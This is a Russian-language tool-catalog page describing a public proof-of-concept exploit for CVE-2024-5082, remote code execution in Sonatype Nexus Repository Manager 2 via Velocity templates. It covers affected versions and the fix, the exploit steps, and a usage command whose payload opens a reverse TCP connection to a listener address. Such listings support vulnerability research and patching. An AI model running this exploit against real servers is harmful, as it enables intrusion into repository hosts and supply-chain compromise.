Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/h4mr3r/cve-2024-5082
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеБезопасность Цепочки ПоставокРазработка Полезной Нагрузки
GitHubh4mr3r/cve-2024-5082

CVE-2024-5082

Эксплойт proof-of-concept для CVE-2024-5082, уязвимости удаленного выполнения кода в Sonatype Nexus Repository Manager 2 через специально созданные Maven-артефакты и обработку шаблонов Velocity.

Репозиторий
121 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Обзор

Этот репозиторий содержит Python-доказательство концепции для CVE-2024-5082, уязвимости удаленного выполнения кода в Sonatype Nexus Repository Manager 2.

Уязвимость позволяет пользователю с достаточными правами опубликовать специально сформированный Maven-артефакт и пометить его для обработки генератором контента Velocity. При получении артефакта встроенный шаблон Velocity обрабатывается Nexus и может выполнить команду в контексте безопасности JVM Nexus.

Согласно Sonatype:

  • затронутые версии включают Nexus Repository Manager 2.x до 2.15.1 включительно;
  • проблема была исправлена в 2.15.2;
  • Nexus Repository 2 достиг конца поддержки 30 июня 2025 года, и его следует мигрировать на Nexus Repository 3.

Важное уточнение области действия

Команда выполняется на хосте Nexus Repository.

Загрузка затронутого артефакта с сервера сборки, сервера приложений или рабочей станции разработчика сама по себе не приводит к выполнению встроенной команды в этой потребляющей системе. Однако компрометация менеджера репозиториев может создать более широкий риск для цепочки поставок, если злоумышленник впоследствии изменит доверенные артефакты, входные данные сборки, учетные данные или конфигурацию репозитория.

Как работает PoC

Скрипт:

  1. Генерирует уникальный путь маркера в пространстве имен в стиле Maven.
  2. Загружает специально созданный файл maven-metadata.xml в выбранный hosted-репозиторий.
  3. Обновляет соответствующие атрибуты Nexus, чтобы генератор контента был установлен в .
velocity
  • Извлекает загруженный артефакт, заставляя Nexus обработать шаблон.
  • Пытается удалить загруженный маркерный артефакт во время очистки.
  • Предоставленная полезная нагрузка создает исходящее TCP-соединение от хоста Nexus к настроенному адресу прослушивателя.

    Аутентификация и разрешения

    Текущий скрипт использует HTTP Basic Authentication и требует:

    • действительных имени пользователя и пароля Nexus;
    • разрешения на создание или обновление содержимого в выбранном репозитории;
    • разрешения на обновление атрибутов, используемое PoC.

    Использование

    root@kitploit:~
    python3 cve_2024_5082.py \\
      --base-url https://nexus.example.test/nexus \\
      --repository security-test-snapshots \\
      --username test-user \\
      --password 'REDACTED' \\
      --lhost LISTENER_IP \\
      --lport 8000
    
    Скачать инструмент